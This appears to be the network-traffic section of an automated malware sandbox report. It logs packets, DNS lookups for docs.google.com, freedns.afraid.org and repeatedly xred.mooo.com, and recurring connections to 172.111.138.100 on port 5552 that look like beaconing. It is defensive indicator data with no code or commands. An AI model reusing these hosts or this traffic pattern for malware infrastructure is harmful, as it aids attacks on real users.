                                                                                                                                      Dec 30, 2024 11:23:42.609790087 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:42.609805107 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.615323067 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.647320032 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.944493055 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.945378065 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.945400953 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.945597887 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.945873022 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.945904016 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.946036100 CET44350045142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.946120024 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.946218967 CET50045443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.946506977 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.946541071 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.946877956 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.947825909 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.947840929 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.975874901 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.975944996 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.975981951 CET50047443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.976006031 CET50047443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.977952957 CET50047443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.977967024 CET44350047142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.977991104 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.978027105 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.979480028 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.979480028 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:42.979512930 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.061994076 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062052965 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062082052 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062099934 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062163115 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.062189102 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062345028 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062851906 CET50044443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.062865019 CET44350044142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.063616991 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.063637018 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.065207958 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.065385103 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.065402985 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069130898 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069171906 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069199085 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069209099 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069375038 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.069426060 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069586992 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069778919 CET50046443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.069782972 CET44350046142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.070142031 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.070199966 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.070455074 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.070455074 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.070497036 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.566720963 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.567666054 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.583378077 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.583659887 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.664397955 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.667675018 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.673207998 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.674523115 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.731812954 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.731831074 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.732007027 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.732011080 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.732913971 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.732927084 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.733145952 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:43.733151913 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.797297001 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.797321081 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.797483921 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.797491074 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.847984076 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.848000050 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:43.848150015 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:43.848156929 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.013819933 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.014674902 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.014766932 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.020839930 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.020898104 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.020921946 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.021022081 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.021630049 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.021682978 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.021737099 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.066180944 CET50059443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.066205025 CET44350059142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.067135096 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.067161083 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.067218065 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.069842100 CET50060443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.069860935 CET44350060142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.073786974 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.073829889 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.073915005 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.077474117 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.077487946 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.089673042 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.089685917 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124528885 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124586105 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124610901 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124628067 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124649048 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124675989 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124681950 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124703884 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.124723911 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.124742031 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.126465082 CET50061443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.126477003 CET44350061142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.127346039 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.127377033 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.127441883 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.127621889 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.127631903 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275629997 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275685072 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275751114 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.275801897 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275861025 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.275907040 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:44.673022985 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:44.676711082 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.676779985 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.677866936 CET555250075172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.677953005 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:44.678862095 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:44.683661938 CET555250075172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.715877056 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.715962887 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:44.726095915 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:44.726146936 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:46.803644896 CET555250075172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:46.803730011 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:47.177333117 CET500755552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:47.182168007 CET555250075172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:53.687556028 CET501225552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:53.692375898 CET555250122172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:53.695715904 CET501225552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:53.696742058 CET501225552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:53.701582909 CET555250122172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.052840948 CET555250122172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.052927017 CET501225552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:58.099592924 CET501225552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:23:58.106812000 CET555250122172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.302772999 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.302793980 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.303364038 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.303391933 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.303664923 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.303688049 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.304723978 CET50062443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.304759026 CET44350062142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.306274891 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.306279898 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.306545019 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.306551933 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.307455063 CET50160443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.307498932 CET44350160142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.307694912 CET50160443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.307883024 CET50160443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.307904959 CET44350160142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.308335066 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.308341980 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.596668959 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.596724987 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.596750975 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.596820116 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.597659111 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.597695112 CET44350066142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.597707987 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.597737074 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.598179102 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.598246098 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.598264933 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.598431110 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.599006891 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.599071026 CET44350067142.250.186.110192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.599095106 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.599138021 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:23:58.622915983 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.622999907 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.623001099 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.623016119 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.623121023 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.623121023 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.623131990 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.623203039 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.623286009 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.623332024 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.623357058 CET44350072142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.623416901 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:23:58.917495966 CET44350160142.250.186.33192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:58.917560101 CET50160443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:24:02.798079014 CET501845552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:02.802993059 CET555250184172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:02.803080082 CET501845552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:02.803353071 CET501845552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:02.808149099 CET555250184172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:05.970314026 CET4971280192.168.2.569.42.215.252
                                                                                                                                      Dec 30, 2024 11:24:05.972564936 CET50066443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:24:05.972589016 CET50067443192.168.2.5142.250.186.110
                                                                                                                                      Dec 30, 2024 11:24:05.972667933 CET50072443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:24:05.972688913 CET50160443192.168.2.5142.250.186.33
                                                                                                                                      Dec 30, 2024 11:24:07.176716089 CET555250184172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:07.176816940 CET501845552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:07.208594084 CET501845552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:07.213861942 CET555250184172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:12.059259892 CET501875552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:12.064183950 CET555250187172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:12.065854073 CET501875552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:12.073961020 CET501875552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:12.078840971 CET555250187172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:14.232384920 CET555250187172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:14.233840942 CET501875552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:14.239478111 CET501875552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:14.245328903 CET555250187172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:21.124996901 CET501905552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:21.129848957 CET555250190172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:21.129933119 CET501905552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:21.130301952 CET501905552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:21.135149002 CET555250190172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:35.041275024 CET555250190172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:35.041335106 CET501905552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:35.051824093 CET501905552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:35.056647062 CET555250190172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:35.077855110 CET501915552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:35.082683086 CET555250191172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:35.082751036 CET501915552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:35.083169937 CET501915552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:35.087905884 CET555250191172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:39.449040890 CET555250191172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:39.449115038 CET501915552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:39.473669052 CET501915552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:39.478461027 CET555250191172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:44.240091085 CET501925552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:44.244910002 CET555250192172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:44.245039940 CET501925552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:44.315371037 CET501925552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:44.320175886 CET555250192172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:46.407064915 CET555250192172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:46.407197952 CET501925552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:46.426942110 CET501925552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:46.431804895 CET555250192172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:53.343846083 CET501935552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:53.348721027 CET555250193172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:53.348814964 CET501935552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:53.349189043 CET501935552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:53.353905916 CET555250193172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:55.509296894 CET555250193172.111.138.100192.168.2.5
                                                                                                                                      Dec 30, 2024 11:24:55.509354115 CET501935552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:55.552894115 CET501935552192.168.2.5172.111.138.100
                                                                                                                                      Dec 30, 2024 11:24:55.557728052 CET555250193172.111.138.100192.168.2.5

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Dec 30, 2024 11:23:04.712969065 CET5475453192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:04.722398043 CET53547541.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:05.177963972 CET5657953192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:05.185205936 CET53565791.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:05.196407080 CET5586653192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:05.204065084 CET53558661.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:05.808444023 CET5824753192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:05.816103935 CET53582471.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:11.472098112 CET5693353192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:11.479224920 CET53569331.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:18.287687063 CET5112553192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:18.295396090 CET53511251.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:25.188884974 CET5125553192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:25.196072102 CET53512551.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:32.047303915 CET5002053192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:32.146699905 CET53500201.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:36.886969090 CET4968653192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:36.894064903 CET53496861.1.1.1192.168.2.5
                                                                                                                                      Dec 30, 2024 11:23:42.563348055 CET6535153192.168.2.51.1.1.1
                                                                                                                                      Dec 30, 2024 11:23:42.570154905 CET53653511.1.1.1192.168.2.5

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Dec 30, 2024 11:23:04.712969065 CET192.168.2.51.1.1.10x36b9Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:05.177963972 CET192.168.2.51.1.1.10xa969Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:05.196407080 CET192.168.2.51.1.1.10xfae2Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:05.808444023 CET192.168.2.51.1.1.10x81fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:11.472098112 CET192.168.2.51.1.1.10x67f8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:18.287687063 CET192.168.2.51.1.1.10x48dfStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:25.188884974 CET192.168.2.51.1.1.10x5c84Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:32.047303915 CET192.168.2.51.1.1.10xd11Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:36.886969090 CET192.168.2.51.1.1.10x511aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:42.563348055 CET192.168.2.51.1.1.10x9848Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Dec 30, 2024 11:23:04.722398043 CET1.1.1.1192.168.2.50x36b9No error (0)docs.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:05.185205936 CET1.1.1.1192.168.2.50xa969Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Dec 30, 2024 11:23:05.204065084 CET1.1.1.1192.168.2.50xfae2No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
